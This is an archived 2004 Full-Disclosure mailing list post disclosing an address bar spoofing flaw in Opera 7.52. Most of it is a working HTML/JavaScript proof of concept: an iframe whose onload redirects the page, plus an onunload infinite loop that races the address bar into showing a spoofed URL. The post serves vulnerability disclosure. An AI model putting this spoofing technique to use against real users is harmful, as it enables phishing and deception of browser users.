[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Opera 7.52 (Build 3834) Address Bar Spoofing Issue

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] Opera 7.52 (Build 3834) Address Bar Spoofing Issue
From: "bitlance winter" <bitlance_3@xxxxxxxxxxx>
Date: Thu, 08 Jul 2004 08:48:23 +0000

Hi List.

A vulnerability is found in the Opera browser version 7.52 , which potentially can be exploited by malicious people to conduct phishing attacks against a user.

The issue may be caused due to a race condition and will sometimes
make it possible to display spoofed information in the address bar
via a specially crafted HTML document.

Tested on WindowsXP SP1.

Demonstration HTML source code:

======== begin ========

[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[title]Opera 7.52 Address Bar Spoofing Vulnerability[/title]
[style type="text/css"]
[!-- /* begin */
 h1 { font-size:120%;}
 h2 { font-size:100%;}
/* end */ --]
[/style]
[script type="text/javascript"]
[!--
function urlfake(){
location.href="http://www.microsoft.com/";;
}
function preinline () {
myvar = '[iframe onload="urlfake()" ';
myvar = myvar +  'title="preload inline frame" ';
myvar = myvar + 'src="http://www.opera.com/"; ';
myvar = myvar +  'frameborder="0" width="760" height="1800" ';
myvar = myvar +  'marginwidth="0" marginheight="0"]';
myvar = myvar +  '[' + '/iframe]';
document.write (myvar);
}
// --]
[/script]
[/head]
[body onunload="while(1){};"]
[h1]Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue[/h1]
[h2]Tested on WindowsXP SP1[/h2]
[p]
[script type="text/javascript"]
[!--
preinline ();
// --]
[/script]
[/p]
[/body]
[/html]
========= end =========
(Sorry,too long code.)

Thank you, List.

--
bitlance winter

_________________________________________________________________ FREE pop-up blocking with the new MSN Toolbar ? get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: RE: [Full-Disclosure] Nokia 3560 Remote DOS
Next by Date: RE: [Full-Disclosure] How big is the danger of IE?
Previous by thread: [Full-Disclosure] Fw: Funny Ass
Next by thread: [Full-Disclosure] File - movie SuCkingPuSSy.mpeg
Index(es):
- Date
- Thread